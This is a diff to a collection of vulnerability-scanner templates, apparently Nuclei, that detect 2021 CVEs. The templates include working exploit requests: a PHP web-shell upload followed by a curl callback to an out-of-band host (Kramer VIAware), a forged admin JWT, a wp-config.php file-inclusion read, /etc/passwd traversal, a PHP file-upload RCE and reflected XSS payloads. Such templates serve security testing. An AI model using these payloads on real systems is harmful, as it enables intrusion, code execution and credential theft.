https://testbnull.medium.com/oracle-access-manager-pre-auth-rce-cve-2021-35587-analysis-1302a4542316 - https://nvd.nist.gov/vuln/detail/CVE-2021-35587 - - https://www.oracle.com/security-alerts/cpujan2022.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2021-35587 cwe-id: CWE-502 - epss-score: 0.95643 - epss-percentile: 0.99239 - cpe: cpe:2.3:a:oracle:access_manager:11.1.2.3.0:*:*:*:*:*:*:* metadata: - verified: true - max-request: 1 - vendor: oracle - product: access_manager - shodan-query: http.title:"Oracle Access Management" fofa-query: body="/oam/pages/css/login_page.css" - tags: cve,cve2021,oam,rce,java,unauth,oracle,kev - -http: + tags: cve,cve2021,oam,rce,java,unauth,oracle +requests: - method: GET path: - '{{BaseURL}}/oam/server/opensso/sessionservice' - matchers-condition: and matchers: + - type: status + status: + - 200 - type: word part: header words: - "x-oracle-dms-ecid" - "x-oracle-dms-rid" - case-insensitive: true condition: or - + case-insensitive: true - type: word part: body words: - "/oam/pages/css/general.css" - - - type: status - status: - - 200 -# digest: 4a0a0047304502207f1a882f95e835876aeb79412637048617f54129971be83309dff3c0c1e9c808022100f998d609a510842d6a1e613991ac1944994c55bf64a648925696c9483e361680:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-36356.yaml b/poc/cve/CVE-2021-36356.yaml index fc0224ed28..c9e0b4294a 100644 --- a/poc/cve/CVE-2021-36356.yaml +++ b/poc/cve/CVE-2021-36356.yaml @@ -1,9 +1,12 @@ id: CVE-2021-36356 + info: name: Kramer VIAware - Remote Code Execution author: gy741 severity: critical description: KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames. + remediation: | + Apply the latest firmware update provided by Kramer to fix the vulnerability and ensure proper input validation in the web interface. reference: - https://www.exploit-db.com/exploits/50856 - https://nvd.nist.gov/vuln/detail/CVE-2021-36356 @@ -14,8 +17,18 @@ info: cvss-score: 9.8 cve-id: CVE-2021-36356 cwe-id: CWE-434 - tags: rce,viaware,cve,cve2021,kramer -requests: + epss-score: 0.88363 + epss-percentile: 0.9839 + cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: kramerav + product: viaware + tags: viaware,cve,cve2021,kramer,edb,rce,intrusive +variables: + useragent: "{{rand_base(6)}}" + +http: - raw: - | POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1 @@ -24,12 +37,18 @@ requests: radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php - | - GET /{{randstr}}.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http://{{interactsh-url}}%22)%7D' HTTP/1.1 + GET /{{randstr}}.php?cmd=sudo+rpm+--eval+'%25{lua%3aos.execute("curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'")}' HTTP/1.1 Host: {{Hostname}} + + matchers-condition: and matchers: - type: word - part: interactsh_protocol + part: interactsh_protocol # Confirms the HTTP Interaction words: - - "http" + - http -# Enhanced by mp on 2022/05/18 + - type: word + part: interactsh_request + words: + - "User-Agent: {{useragent}}" +# digest: 4a0a00473045022038f33dbb8c0e4e04f81a15960ffcabd69af2843f7f1a1e19609931f3ca3e0541022100c8117ef56cbb512b2c048b44d2ff596af4af06cb9d8e325d011eb6bd7ab2013b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-37216.yaml b/poc/cve/CVE-2021-37216.yaml index f981030ee1..168adaeeaa 100644 --- a/poc/cve/CVE-2021-37216.yaml +++ b/poc/cve/CVE-2021-37216.yaml @@ -1,51 +1,35 @@ id: CVE-2021-37216 - info: - name: QSAN Storage Manager <3.3.3 - Cross-Site Scripting + name: QSAN Storage Manager prior to v3.3.3 Reflected XSS author: dwisiswant0 - severity: medium description: | - QSAN Storage Manager before 3.3.3 contains a reflected cross-site scripting vulnerability. Header page parameters do not filter special characters. Remote attackers can inject JavaScript to access and modify specific data. - remediation: | - Upgrade QSAN Storage Manager to version 3.3.3 or later to mitigate this vulnerability. - reference: - - https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-37216 + QSAN Storage Manager header page parameters does not filter special characters. + Remote attackers can inject JavaScript without logging in and launch + reflected XSS attacks to access and modify specific data. + reference: https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html + severity: medium + tags: cve,cve2021,xss,qsan,storage classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-37216 cwe-id: CWE-79 - epss-score: 0.00106 - epss-percentile: 0.4304 - cpe: cpe:2.3:o:qsan:xn8024r_firmware:3.1.5:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: qsan - product: xn8024r_firmware - tags: cve,cve2021,xss,qsan,storage - -http: +requests: - method: GET path: - "{{BaseURL}}/http_header.php" - headers: X-Trigger-XSS: "" - matchers-condition: and matchers: - - type: dsl - dsl: - - "!contains(tolower(header), 'x-xss-protection')" - - type: word part: body words: - '"HTTP_X_TRIGGER_XSS":""' - - type: word part: header words: - "text/html" -# digest: 4a0a00473045022100ddb4cebba2f5fcc8e9adec90efdaca2fe4b9a1d1be7d350065d052b93c7a28dc02201e42d6576744bd3880440724e8b83ef2cf876b7e7f9e63b422871be99861c648:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - type: dsl + dsl: + - "!contains(tolower(all_headers), 'x-xss-protection')" diff --git a/poc/cve/CVE-2021-37416.yaml b/poc/cve/CVE-2021-37416.yaml index 3f2ac17b38..ea5a0d7149 100644 --- a/poc/cve/CVE-2021-37416.yaml +++ b/poc/cve/CVE-2021-37416.yaml @@ -1,38 +1,52 @@ id: CVE-2021-37416 + info: - name: Zoho ManageEngine ADSelfService Plus - Reflected XSS + name: Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting author: edoardottt severity: medium - description: Zoho ManageEngine ADSelfService Plus version 6103 and prior is vulnerable to reflected XSS on the loadframe page. + description: Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page. + remediation: | + Upgrade to a patched version of Zoho ManageEngine ADSelfService Plus (version >6103) to mitigate this vulnerability. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416 + - https://blog.stmcyber.com/vulns/cve-2021-37416/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-37416 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-37416 cwe-id: CWE-79 + epss-score: 0.00118 + epss-percentile: 0.45672 + cpe: cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:*:*:*:*:*:*:*:* metadata: - shodan-query: http.title:"ManageEngine" verified: true - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-37416 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37416 - - https://blog.stmcyber.com/vulns/cve-2021-37416/ + max-request: 1 + vendor: zohocorp + product: manageengine_adselfservice_plus + shodan-query: http.title:"ManageEngine" tags: cve,cve2021,zoho,xss -requests: + +http: - method: GET path: - "{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E" + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: header words: - "text/html" + - type: word part: body words: - ">" - "adsf/js/" condition: and + + - type: status + status: + - 200 +# digest: 4a0a0047304502207addd537e07781cc3b8c8d0b4620afde94b9ccb2bb20bc3acad9181043464f37022100c3a734611cf58b5296bb3a38cfc079d6ae0aa9b0dbb906104c273badfa2212d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-37580.yaml b/poc/cve/CVE-2021-37580.yaml index 326f01e24f..e83ef1c7fa 100644 --- a/poc/cve/CVE-2021-37580.yaml +++ b/poc/cve/CVE-2021-37580.yaml @@ -1,9 +1,12 @@ id: CVE-2021-37580 + info: name: Apache ShenYu Admin JWT - Authentication Bypass author: pdteam severity: critical description: Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication. + remediation: | + Apply the patch or upgrade to the latest version of Apache ShenYu to fix the authentication bypass vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-37580 - https://github.com/fengwenhua/CVE-2021-37580 @@ -14,13 +17,22 @@ info: cvss-score: 9.8 cve-id: CVE-2021-37580 cwe-id: CWE-287 + epss-score: 0.91668 + epss-percentile: 0.98635 + cpe: cpe:2.3:a:apache:shenyu:2.3.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: apache + product: shenyu tags: cve,cve2021,apache,jwt,shenyu -requests: + +http: - raw: - | GET /dashboardUser HTTP/1.1 Host: {{Hostname}} X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwiZXhwIjoxNjM3MjY1MTIxfQ.-jjw2bGyQxna5Soe4fLVLaD3gUT5ALTcsvutPQoE2qk + matchers-condition: and matchers: - type: word @@ -29,8 +41,8 @@ requests: - '"userName":"admin"' - '"code":200' condition: and + - type: status status: - 200 - -# Enhanced by mp on 2022/05/02 +# digest: 4a0a00473045022100d015114f5c649b19ec82d37c22b9a2ef8fe3d3d6da73f17340a622072a6c588d022020cf627bdb18789231b2034c0990d3d89617fb37b3aa3a99f44005f12a28d38e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-38702.yaml b/poc/cve/CVE-2021-38702.yaml index cf51a9d3b3..d36c7258bd 100644 --- a/poc/cve/CVE-2021-38702.yaml +++ b/poc/cve/CVE-2021-38702.yaml @@ -1,19 +1,32 @@ id: CVE-2021-38702 info: - name: Cyberoam NetGenie XSS + name: Cyberoam NetGenie Cross-Site Scripting author: geeknik severity: medium - description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow for reflected Cross Site Scripting via the 'u' parameter of ft.php. - reference: https://seclists.org/fulldisclosure/2021/Aug/20 - tags: cve,cve2021,cyberoam,netgenie,xss,router + description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php. + remediation: | + Apply the latest security patches or firmware updates provided by the vendor to mitigate this vulnerability. + reference: + - https://seclists.org/fulldisclosure/2021/Aug/20 + - https://nvd.nist.gov/vuln/detail/CVE-2021-38702 + - http://www.cyberoamworks.com/NetGenie-Home.asp + - http://packetstormsecurity.com/files/163859/Cyberoam-NetGenie-Cross-Site-Scripting.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-38702 cwe-id: CWE-79 + epss-score: 0.0076 + epss-percentile: 0.79027 + cpe: cpe:2.3:o:cyberoamworks:netgenie_c0101b1-20141120-ng11vo_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: cyberoamworks + product: netgenie_c0101b1-20141120-ng11vo_firmware + tags: cyberoam,netgenie,xss,router,seclists,cve,packetstorm,cve2021 -requests: +http: - method: GET path: - "{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -25,10 +38,11 @@ requests: - "" - type: word + part: header words: - "text/html" - part: header - type: status status: - 200 +# digest: 4a0a004730450220351881cd61d500d7b9ff1874d8462f30ddc1afacbff8d760a6d921efd0b7c7860221009bdfb45ebb721a4a690dda3679d6f940ce539ec54b87bd65cd05754e5435a7cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-38704.yaml b/poc/cve/CVE-2021-38704.yaml index 8bd65db807..f6123c5175 100644 --- a/poc/cve/CVE-2021-38704.yaml +++ b/poc/cve/CVE-2021-38704.yaml @@ -1,12 +1,9 @@ id: CVE-2021-38704 - info: - name: ClinicCases 7.3.3 Cross-Site Scripting + name: ClinicCases 7.3.3 Reflected Cross-Site Scripting author: alph4byt3 severity: medium description: ClinicCases 7.3.3 is susceptible to multiple reflected cross-site scripting vulnerabilities that could allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft. - remediation: | - To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/sudonoodle/CVE-2021-38704 - https://nvd.nist.gov/vuln/detail/CVE-2021-38704 @@ -16,34 +13,25 @@ info: cvss-score: 6.1 cve-id: CVE-2021-38704 cwe-id: CWE-79 - epss-score: 0.00141 - epss-percentile: 0.49694 - cpe: cpe:2.3:a:cliniccases:cliniccases:7.3.3:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: cliniccases - product: cliniccases shodan-query: http.title:"ClinicCases",html:"/cliniccases/" tags: xss,cve,cve2021,cliniccases - -http: +requests: - method: GET path: - '{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word part: body words: - "" - - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4a0a0047304502205def21c0dc606d06e3212f573a2591cfe0af45d9282dae68558848673c9bfda402210081d49cd86041400b811ea2a5553b46c1982f89f627bad3e0383e6909ca9530eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/28 diff --git a/poc/cve/CVE-2021-38751.yaml b/poc/cve/CVE-2021-38751.yaml index e44088c6a4..926b40bab6 100644 --- a/poc/cve/CVE-2021-38751.yaml +++ b/poc/cve/CVE-2021-38751.yaml @@ -1,9 +1,12 @@ id: CVE-2021-38751 + info: - name: ExponentCMS <= 2.6 Host Header Injection + name: ExponentCMS <= 2.6 - Host Header Injection author: dwisiswant0 severity: medium description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack vector for MITM. + remediation: | + Upgrade ExponentCMS to a version higher than 2.6 or apply the provided patch to fix the Host Header Injection vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-38751 - https://github.com/exponentcms/exponent-cms/issues/1544 @@ -13,24 +16,34 @@ info: cvss-score: 4.3 cve-id: CVE-2021-38751 cwe-id: CWE-116 + epss-score: 0.00242 + epss-percentile: 0.62003 + cpe: cpe:2.3:a:exponentcms:exponentcms:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: exponentcms + product: exponentcms tags: cve,cve2021,exponentcms -requests: + +http: - method: GET path: - "{{BaseURL}}" + headers: - Host: "{{randstr}}.tld" + Host: '{{randstr}}.tld' + matchers-condition: and matchers: - type: word + part: body words: - '{{randstr}}.tld' - 'EXPONENT.PATH' - 'EXPONENT.URL' - part: body condition: and + - type: status status: - 200 - -# Enhanced by mp on 2022/03/23 +# digest: 4b0a00483046022100bd10a0651e15e75c49a182f851ba21f4cf0a758c8d3fba6e6d6354ec7d1645f4022100d80e2e17a50c1c169be5be155979072e8de47a89013edeae4946134487ee8983:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-39211.yaml b/poc/cve/CVE-2021-39211.yaml index 0847c7cf42..136bfacadf 100644 --- a/poc/cve/CVE-2021-39211.yaml +++ b/poc/cve/CVE-2021-39211.yaml @@ -1,24 +1,35 @@ id: CVE-2021-39211 + info: - name: GLPI Telemetry Disclosure + name: GLPI 9.2/<9.5.6 - Information Disclosure author: dogasantos,noraj severity: medium - description: GLPI => 9.2 and < 9.5.6, the telemetry endpoint discloses GLPI and server information. + description: GLPI 9.2 and prior to 9.5.6 is susceptible to information disclosure via the telemetry endpoint, which discloses GLPI and server information. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: This issue is fixed in version 9.5.6. As a workaround, remove the file ajax/telemetry.php, which is not needed for usual GLPI functions. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-39211 - https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825 - https://github.com/glpi-project/glpi/releases/tag/9.5.6 + - https://nvd.nist.gov/vuln/detail/CVE-2021-39211 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2021-39211 - cwe-id: CWE-668,CWE-200 + cwe-id: CWE-200,NVD-CWE-noinfo + epss-score: 0.00166 + epss-percentile: 0.53249 + cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: glpi-project + product: glpi tags: cve,cve2021,glpi,exposure -requests: + +http: - method: GET path: - "{{BaseURL}}/ajax/telemetry.php" - "{{BaseURL}}/glpi/ajax/telemetry.php" + matchers-condition: and matchers: - type: word @@ -26,6 +37,8 @@ requests: - '"uuid":' - '"glpi":' condition: and + - type: status status: - 200 +# digest: 4a0a004730450220493c71801722f7e62cca179faa4bd7d3ef10fb9f358b42162ae4ebab27fee6f1022100879a2331f916109ef5ec80b5a2e795e4f9a8e9200df37a6e7dcdfe78b5686752:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-39226.yaml b/poc/cve/CVE-2021-39226.yaml index 1bff9d9534..3266a19a2b 100644 --- a/poc/cve/CVE-2021-39226.yaml +++ b/poc/cve/CVE-2021-39226.yaml @@ -1,30 +1,44 @@ id: CVE-2021-39226 + info: - name: Grafana Snapshot Authentication Bypass + name: Grafana Snapshot - Authentication Bypass author: Evan Rubinstein + severity: high description: Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default). - remediation: "This issue has been resolved in versions 8.1.6 and 7.5.11. If you cannot upgrade you can block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects." + remediation: 'This issue has been resolved in versions 8.1.6 and 7.5.11. If you cannot upgrade you can block access to the literal paths: /api/snapshots/:key, /api/snapshots-delete/:deleteKey, /dashboard/snapshot/:key, and /api/snapshots/:key. They have no normal function and can be disabled without side effects.' reference: - https://github.com/advisories/GHSA-69j6-29vr-p3j9 - https://nvd.nist.gov/vuln/detail/CVE-2021-39226 - severity: critical - tags: cve,cve2021,grafana + - https://github.com/grafana/grafana/commit/2d456a6375855364d098ede379438bf7f0667269 + - https://grafana.com/docs/grafana/latest/release-notes/release-notes-8-1-6/ + - http://www.openwall.com/lists/oss-security/2021/10/05/4 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 cve-id: CVE-2021-39226 - cwe-id: CWE-200 -requests: + cwe-id: CWE-287 + epss-score: 0.92988 + epss-percentile: 0.988 + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: grafana + product: grafana + shodan-query: title:"Grafana" + tags: cve,cve2021,grafana,kev + +http: - method: GET path: - "{{BaseURL}}/api/snapshots/:key" + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word words: - '"isSnapshot":true' -# Enhanced by cs on 2022/02/22 + - type: status + status: + - 200 +# digest: 490a004630440220724d7049bfdc5f75f1a8a34ba19b4b50804ecad851816de8bf9605e2cd3104d102206c42edabf1b7f4e0cbb32d0d5d50da94730819e1a944c39e04ca6e8ca94883ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-39312.yaml b/poc/cve/CVE-2021-39312.yaml index c01cb9c597..02e3b11697 100644 --- a/poc/cve/CVE-2021-39312.yaml +++ b/poc/cve/CVE-2021-39312.yaml @@ -1,32 +1,22 @@ id: CVE-2021-39312 - info: name: WordPress True Ranker <2.2.4 - Local File Inclusion author: DhiyaneshDK severity: high description: WordPress True Ranker before version 2.2.4 allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file via local file inclusion. - remediation: Fixed in version 2.2.4 reference: - https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79 - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312 - https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php - https://nvd.nist.gov/vuln/detail/CVE-2021-39312 + remediation: Fixed in version 2.2.4 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-39312 - cwe-id: CWE-22 - epss-score: 0.06634 - epss-percentile: 0.93061 - cpe: cpe:2.3:a:trueranker:true_ranker:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: trueranker - product: true_ranker - framework: wordpress - tags: unauth,lfr,wpscan,cve,cve2021,wp-plugin,lfi,wp,wordpress - -http: + cwe-id: CWE-22,CWE-22 + tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,unauth,lfr +requests: - raw: - | POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1 @@ -35,7 +25,6 @@ http: Cookie: wordpress_test_cookie=WP%20Cookie%20check src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php - matchers-condition: and matchers: - type: word @@ -44,8 +33,8 @@ http: - "DB_NAME" - "DB_PASSWORD" condition: and - - type: status status: - 200 -# digest: 490a0046304402203660c5019a3cd1bf62a8253c6dbe4802a218ac3e49b420f0c7924aaced5592c10220344d7c776624e12950508b7434bdca716d524e807294a21cb56b68774a46a3c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/30 diff --git a/poc/cve/CVE-2021-40868.yaml b/poc/cve/CVE-2021-40868.yaml index 83e04d2453..be592e9734 100644 --- a/poc/cve/CVE-2021-40868.yaml +++ b/poc/cve/CVE-2021-40868.yaml @@ -1,5 +1,4 @@ id: CVE-2021-40868 - info: name: Cloudron 6.2 Cross-Site Scripting author: daffainfo @@ -9,40 +8,28 @@ info: reference: - https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2021-40868 - - https://packetstormsecurity.com/files/164183/Cloudron-6.2-Cross-Site-Scripting.html - - https://www.cloudron.io/ + tags: cve,cve2021,xss,cloudron classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-40868 cwe-id: CWE-79 - epss-score: 0.00267 - epss-percentile: 0.64121 - cpe: cpe:2.3:a:cloudron:cloudron:6.2:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: cloudron - product: cloudron - tags: cve,cve2021,xss,cloudron,packetstorm - -http: +requests: - method: GET path: - '{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: + - type: status + status: + - 200 - type: word part: header words: - "text/html" - - type: word - part: body words: - '' + part: body - - type: status - status: - - 200 -# digest: 4a0a00473045022100a1d8a102cc043267832fa94d11d430345354fd5df4b460554a26aa1a60c083c102204f80a05e99897cc2acf09de2b8b484233956a43510fd6d956c96da0d5e14555a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# Enhanced by mp on 2022/03/06 diff --git a/poc/cve/CVE-2021-40870.yaml b/poc/cve/CVE-2021-40870.yaml index c40e570da3..db8ead6510 100644 --- a/poc/cve/CVE-2021-40870.yaml +++ b/poc/cve/CVE-2021-40870.yaml @@ -1,41 +1,51 @@ id: CVE-2021-40870 + info: - name: Aviatrix Controller 6.x before 6.5-1804.1922 Remote Command Execution + name: Aviatrix Controller 6.x before 6.5-1804.1922 - Remote Command Execution author: pikpikcu severity: critical description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal. + remediation: | + Upgrade Aviatrix Controller to version 6.5-1804.1922 or later to mitigate this vulnerability. reference: - https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021 - https://wearetradecraft.com/advisories/tc-2021-0002/ - https://nvd.nist.gov/vuln/detail/CVE-2021-40870 + - http://packetstormsecurity.com/files/164461/Aviatrix-Controller-6.x-Path-Traversal-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-40870 - cwe-id: CWE-434 - tags: cve,cve2021,rce,aviatrix,kev -requests: + cwe-id: CWE-23 + epss-score: 0.9088 + epss-percentile: 0.98553 + cpe: cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: aviatrix + product: controller + tags: intrusive,packetstorm,cve,cve2021,rce,aviatrix,kev,fileupload + +http: - raw: - | POST /v1/backend1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=HACKERMAN + CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data= - | GET /v1/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word words: - - 'HACKERMAN' - - "PHP Extension" - - "PHP Version" - condition: and + - '0d95513363fd69b9fee712f333293654' -# Enhanced by mp on 2022/03/06 + - type: status + status: + - 200 +# digest: 4a0a0047304502200eec3d9aadf7bb71831a8b8e148b1902d3d6bc0fb24119a516d7d3797e47a05b022100cda620925d111f86251eb1e8da423aedc562bd5118930fcd608a22f1e4caaf3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2021-40960.yaml b/poc/cve/CVE-2021-40960.yaml index e4cb4cbc26..2e39c1b7b4 100644 --- a/poc/cve/CVE-2021-40960.yaml +++ b/poc/cve/CVE-2021-40960.yaml @@ -1,42 +1,29 @@ id: CVE-2021-40960 - info: name: Galera WebTemplate 1.0 Directory Traversal author: daffainfo severity: critical description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Galera WebTemplate 1.0. reference: - http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960 - - http://www.galera.com.tr/ + tags: cve,cve2021,lfi classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2021-40960 cwe-id: CWE-22 - epss-score: 0.00946 - epss-percentile: 0.81377 - cpe: cpe:2.3:a:galera:galera_webtemplate:1.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: galera - product: galera_webtemplate - tags: cve,cve2021,lfi - -http: +requests: - method: GET path: - "{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd" - matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - - type: status status: - 200 -# digest: 4a0a0047304502210088c148ff9f89f9815cdd50e5d3e4d5b8249e4413fc6b373a135d8c02d22d02f802207cd7e243133a94b5fa46eea3a0266327434cf04da3b5b70745b30f428176335e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/06 diff --git a/poc/cve/CVE-2021-40978.yaml b/poc/cve/CVE-2021-40978.yaml index 81ec5d959e..45793e0f1b 100644 --- a/poc/cve/CVE-2021-40978.yaml +++ b/poc/cve/CVE-2021-40978.yaml @@ -1,33 +1,45 @@ id: CVE-2021-40978 info: - name: mkdocs 1.2.2 built-in dev-server allows directory traversal + name: MKdocs 1.2.2 - Directory Traversal author: pikpikcu severity: high + description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited. + remediation: | + Upgrade MKdocs to version 1.2.3 or later to fix the 